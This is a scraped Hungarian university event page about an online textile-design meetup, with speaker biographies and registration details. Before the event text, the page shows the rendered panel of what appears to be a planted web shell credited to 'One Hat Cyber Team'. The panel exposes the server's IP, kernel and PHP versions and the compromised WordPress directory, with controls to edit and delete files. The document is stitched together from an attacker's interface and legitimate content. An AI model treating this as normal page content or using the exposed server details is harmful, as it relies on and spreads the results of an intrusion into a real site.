• Your IP : 44.211.84.185
 • Server IP : 185.51.66.243
 • Server : Linux mail.silverfrog.eu 2.6.32-954.3.5.lve1.4.89.el6.x86_64 #1 SMP Sat May 7 10:18:11 UTC 2022 x86_64
 • Server Software : LiteSpeed
 • PHP Version : 8.0.26
 • Add File : Submit
 • Add Directory : Submit
 • Dir : ~/home/metujump/public_html/meetup.metropolitan.hu/
 • Name Size Permission Action
  .well-known drwxr-xr-x Rename Delete
  .wp-cli drwxr-xr-x Rename Delete
  configBIJ drwxr-xr-x Rename Delete
  wp-admin drwxr-xr-x Rename Delete
  wp-content drwxr-xr-x Rename Delete
  wp-includes drwxr-xr-x Rename Delete
  .htaccess 2.165 KB -r--r--r-- Edit Rename Delete
  .user.ini 0.575 KB -rw-r--r-- Edit Rename Delete
  74512f56c6ffdbb35fcf951dc248b56a.txt 0.001 KB -rw-r--r-- Edit Rename Delete
  error_log 301.444 KB -rw-r--r-- Edit Rename Delete
  index.php 10.581 KB -r--r--r-- Edit Rename Delete
  license.txt 19.448 KB -rw-r--r-- Edit Rename Delete
  mhapjbsu.php 14.904 KB -rw-r--r-- Edit Rename Delete
  olvasdel.html 8.537 KB -rw-r--r-- Edit Rename Delete
  php.ini 0.569 KB -rw-r--r-- Edit Rename Delete
  readme.html 7.216 KB -rw-r--r-- Edit Rename Delete
  wordpress-5.6-hu_HU.zip 17.12 MB -rw-r--r-- Edit Rename Delete
  wp-activate.php 7.036 KB -rw-r--r-- Edit Rename Delete
  wp-blog-header.php 0.343 KB -rw-r--r-- Edit Rename Delete
  wp-comments-post.php 2.283 KB -rw-r--r-- Edit Rename Delete
  wp-config-sample.php 2.931 KB -rw-r--r-- Edit Rename Delete
  wp-config.php 3.043 KB -rw------- Edit Rename Delete
  wp-cron.php 5.413 KB -rw-r--r-- Edit Rename Delete
  wp-links-opml.php 2.436 KB -rw-r--r-- Edit Rename Delete
  wp-load.php 3.892 KB -rw-r--r-- Edit Rename Delete
  wp-login.php 47.983 KB -rw-r--r-- Edit Rename Delete
  wp-mail.php 8.322 KB -rw-r--r-- Edit Rename Delete
  wp-settings.php 24.011 KB -rw-r--r-- Edit Rename Delete
  wp-signup.php 33.545 KB -rw-r--r-- Edit Rename Delete
  wp-trackback.php 4.799 KB -rw-r--r-- Edit Rename Delete
  xmlrpc.php 3.16 KB -rw-r--r-- Edit Rename Delete
  © Copyright 2022 Mr.Combet Powered by One Hat Cyber Team
  Textil – METU MEETUP

  A SOKOLDALÚ
  TEXTIL

  Online meetup textiltervezésről 

  2021. október 12. kedd, 18.00-19.30  

  A SOKOLDALÚ TEXTIL

  eszköz, rendszer, üzenet, szálak, szövetek, matériák

  bdw_partnerlogo_fekvo_fekete

  A program a Budapest Design Week 2021 fesztivál hivatalos programja. A fesztivál védnöke és finanszírozója a Szellemi Tulajdon Nemzeti Hivatala, szervezője a Magyar Formatervezési Tanács.

  Online eseményünkön körbejárjuk, hogy ezt az izgalmas matériát hogyan kombinálják tervezőink, hozzák létre és termékenyítik meg a különféle tudományágakkal.

  A textil egyidejűleg eszköz, rendszer, üzenet, nem csupán egy nyersanyag. A hozzá kapcsolódó viszonyunk, értelmezéseink, feldolgozásaink módja sokat elárul arról, hogy érzékeljük, értelmezzük és helyezzük el magunkat a világban.

  A textiltervezésnek számos oldala van: túl a kézműves meghatározottságon, a textil az innováció terepe. Textiltervezőink újra meg újra feltalálják a szálak, szövetek, matériák világát, színharmóniáikkal, mintáikkal, textúráikkal, funkcionalitásaikkal és szemléletükkel gazdagítják, teszik teljessé.

  Ebben a hibrid folyamatban, ahol az alkotó egyben kutató, előremutató, innovatív, miként születnek alkalmazott termékek az enteriőr, a divat, az építészet, a képzőművészet és a kutatás területein.  

  Nézd vissza a teljes felvételt!

  Kattints ide
  Belépés a videótárba

  BESZÉLGETŐ PARTNEREINK

  Az eseménysorozaton neves szakemberek, művészek, alkotók bevonásával aktuális témákat járunk körül.

  Hegedűs Andrea

  Ferenczi Noémi-díjas textiltervező művész, a METU oktatója
  Textiltervezői diplomája megszerzése után több évet töltött ösztöndíjasként külföldön, ahol a textilszakma élvonalába tartozó gyártókkal együtt dolgozott Svájcban, Németországban és Franciaországban. Budapestre való visszatérése után saját designstúdiót alapított. Szakmai küldetéséhez tartozik, hogy az innovátorok élvonalában legyen, így a folyamatos kísérletezés az új anyagok-, technikák felfedezése szerves részét képezi tervezői munkájának. A teljes kreatív folyamat során a mesterség hagyományos technikáit alkalmazza, és az így keletkezett terveket a legmodernebb technológia eszközeivel kelti életre, amelynek legutóbbi sikeres innovációjaként megszületett az üvegtextil. Az enteriőrtervezés területén új műfajt teremtett a síküveg és a textil innovatív művészeti kombinációja, amely az ipari technológia és a kézművesség elegyéből keletkezett.

  Papp Anett

  textiltervező művész, design- és vizuálisművészet tanár, egyetemi tanársegéd, a METU Kézműves tárgykultúra alapszakának és Textilművesség specializációjának vezetője
  Textiltervező művész mester diplomáját szövöttanyag tervező szakon kitüntetéssel szerezte a Moholy-Nagy Művészeti Egyetemen, ezt egészítette ki design- és vizuálisművészet tanári mester diplomával. Kétszer nyerte el a Köztársasági Ösztöndíjat. Tanult textiltervezést Belgiumban, ahol a természetes alapanyagok feldolgozási lehetőségeit vizsgálta. Doktori védése előtt áll a MOME doktori iskolájában. Témája a textil kereteinek kitágítása, kutatásorientált attitűdje a biológiai alapú textiltervezés területén hozott eredményeket. Fontos kérdésfeltevése, hogyan tudjuk élő rendszerekkel együttműködésben új, fenntartható anyagok prototípusait előállítani? A METU főállású oktatója, 2020 óta a Kézműves tárgykultúra alapszak szakvezetője és a Textil specializáció specializációvezetője. Szervezésében valósult meg a GLocal szimpozium, melynek kutatási eredményeit és módszertani tapasztalatait a képzésbe építi.

  Tsur Dorina

  textiltervező művész, METU alumna
  Tsur Dorina 2020-ban szerezte meg mesterdiplomáját textiltervezőként a Budapesti Metropolitan Egyetemen. 2019-ben Köztársasági Ösztöndíjban részesült. 2021-ben részt vett a XXV. International Federation of Association of Textile Chemists and Colourists (IFATCC) nemzetközi konferencián, amely évente a textil szakma leginnovatívabb eredményeit veszi górcső alá.  A kézi szövést és varrási technikákat alkalmazó Láthatósági táskakollekciójával egyetemi tanulmányai idején is számos díjban részesült, megnyerte a 2019-es OMDK Craft kategóriáját: átlátszó hangszórókábel, drót és damil, melyek szokványos anyagnak számítanak saját speciális felhasználási területükön, de a szövésben való alkalmazásuk nem jellemző. Innovatív anyagkísérleteit tovább folytatta új kollekcióiban és munkáiban, az újrahasznosítás és fenntartható fejlődés kihívásainak megfelelve. Mester diplomája újrahasznosított anyagkísérlet kollekció, melynek továbbfejlesztése a 2021-es OMDK Design kategória III. helyezettje lett.

  Dr. Kokasné Dr. Palicska Lívia

  textilmérnök, vezérigazgató, INNOVATEXT Zrt.
  Okleveles textilmérnök, vezérigazgató, a Magyar Könnyűipari Szövetség elnöke és a Textilipari Műszaki Tudományos Egyesület alelnöke. Németországban végezte tanulmányait, majd a Soproni Egyetemen szerzett PhD fokozatot. Három évtizedes munkásságát a felsőoktatásban számos sikeres hallgatói karrier, nemzetközi projekt és publikáció fémjelzi. 2014-től vezeti a nemzetközi Hohenstein csoporthoz tartozó INNOVATEXT Zrt-t, amely a hazai textil- és ruhaipar meghatározó kutató-fejlesztő bázisa. Vezetése alatt dinamikusan bővült szolgáltatásuk a világszerte elismert OEKO-TEX® tanúsítások és az egyéni védőeszközök területén.

  HUSZÁR KATALIN

  CMF Designer
  Ha bemutatkozásra kerül a sor, leginkább CMF designerként azonosítja magát, amit egy milánói stúdióban próbált ki először. Tökéletesen magába foglalja azt a fajta hibridséget, amit a hátterével képvisel. Hatalmas mozgásteret ad a munkában, a felmerülő kérdésekben, az egyes szakterületek közti átfedések miatt. A formatervezéstől elkezdve az autóiparon át, még a belsőépítészetben felmerülő szín, anyag és mintatervezést is magába foglalja ez a három betű. “A tervezések során számomra a legfontosabb, hogy megértsem ki a célközönség, illetve mi az ő valódi problémája, majd erre frappáns válasszal reflektáljak.” Jelenleg különösen az új anyagok felkutatása, majd a megfelelő formatervekbe való integrálása foglalkoztatja.

  A BESZÉLGETÉST VEZETI

  Oltai Kata

  művészettörténész, kurátor
  10 éve az intézményen kívüliséget választotta, a VIII. kerületben 2015-ben alapította a FERi non profit feminista galériát, mely szoros kohézióban működik a Konfekció nevű vintage bolttal, melynek szintén tulajdonosa. Számos nemzetközi csoportos és egyéni kiállítás kurátora, közintézményi és privát szektori tapasztalattal, öt könyv szerkesztője és szerzője, kulturális producerként mind az ún. független szektorban, mind a kereskedelmi szektorban dolgozott. Az utóbbi 5 évben a kultúrkritikai szempontrendszer beemelése és az elkötelezett kurátori attitűd számára a legfontosabb szerepkör.

  GYERE EL A Következő MEETUPRA IS!

  Regisztrálj következő meetupunkra, vagy nézd vissza előző eseményeinket felvételről!

  Előző Meetupok

  Regisztráció

  Regisztrálj, hogy le ne maradj! 

  Az eseményt Zoom alkalmazás használatával valósítjuk meg. 

  Az online beszélgetésen való részvételhez előzetes regisztráció szükséges!
  A regisztráció során megadott e-mail címedre küldjük el a belépéshez szükséges adatokat. 

  A műsorváltoztatás jogát fenntartjuk. 

  ISMERD MEG KÉPZÉSEINKET

  Fotó kreditek: 

  Oltai Kata: Bánkuti András
  Huszár Katalin: Sztojkov Alexandra
  Hegedűs Andrea portré és 4-es metró: Bujnovszky Tamás
  Papp Anett: Ludman Dániel
  Dr. Kokasné Dr. Palicska Lívia: Kürti Ákos 

  nézd vissza!

  Add meg a neved és az e-mail címed, és máris elküldjük neked a jelszót, amivel be tudsz lépni a Videotárba és visszanézheted az összes korábbi Meetup felvételét.
  Ha már ismered a jelszót, kattints az “irány a Videótár” gombra.